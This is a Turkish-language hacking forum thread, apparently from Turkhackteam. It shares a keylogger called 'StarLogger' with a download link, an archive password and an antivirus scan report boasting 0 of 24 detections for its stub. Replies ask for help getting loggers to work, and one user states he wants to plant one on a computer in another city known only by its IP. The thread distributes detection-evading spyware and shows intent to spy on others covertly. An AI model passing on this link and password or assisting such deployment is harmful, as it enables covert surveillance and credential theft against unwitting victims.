StarLogger [-Free %100 FuD-] @Hooks@

https://tik.lat/yGK0d
Rar Pass : Wretch-x

Report generated: 23.1.2010 at 10.52.46 (GMT 1)
Filename: Stub.exe
File size: 41472 bytes
MD5 hash: 328c8f57c0828afc81ddd0bce262b784
SHA1 hash: 0BD4F924C8B51EB98705EA13DA2BD93F981E8BAB
Detection rate: 0 on 24
Status: CLEAN

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Son düzenleme:

fathers

Yeni üye
16 Şub 2011
49
0
baksanıza bı ya kendı serverını gommedıyse ındrıcem calısırmı acaba offff

ben pek anlamam calıstıran olursa yazsın....

[KIMSE ADAM GIBI LOGGER PAYLASAMADI SITEDE ADAM GIBI LOGGER YOK ADAM KENDI SERVERINI GOMMEMISSEDE CALISMIYOR :S BOSU BOSUNAMI BU TROJAN BOLUMU!]

Son düzenleme:

ottomanaga

Yeni üye
24 Şub 2011
1
0
ya dostum freeware bi keylogger yok mudur?
Bunu paylaşacak bi aklı selim insan yok mudur?

herkes mi aradan trojanla gol bulayıım peşinde anlamıyorum ki.
bu program da 30 günlük. denemiyorum bile.

Daha bunun karşı tarafa sokması var, IP'Sini biliyorum sadece. bşka şehirdeki bi bilgisayara sokacağım için dertliyim anlicaan

qApTan

Yeni üye
19 Kas 2010
44
0
baksanıza bı ya kendı serverını gommedıyse ındrıcem calısırmı acaba offff

ben pek anlamam calıstıran olursa yazsın....

[KIMSE ADAM GIBI LOGGER PAYLASAMADI SITEDE ADAM GIBI LOGGER YOK ADAM KENDI SERVERINI GOMMEMISSEDE CALISMIYOR :S BOSU BOSUNAMI BU TROJAN BOLUMU!]
Kimsenin işi gücü yok senin pc ye logler mi atacak ?
Güvenmiyorsan kendi logler programını hazırla kendi serverini kur akrdesim
Paylaşım yapan kişilere hakaret etmeyin günahlarını almayın onlar sizin için paylaşıyor aip denilen bişe var !

thegamemylife

Yeni üye
20 Şub 2011
13
0
EMEĞE SAYGI ! kardeşm bn programı indirdm çalıştırdım ama nasıl kullanabilceğimizi resmli olarak anlatabilirmsn bugn kesnlikle çözmem lazm şu keyloger işini 30 tane indirdm 30 uda çalışmıyo çıldırmak üzereyim .s

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.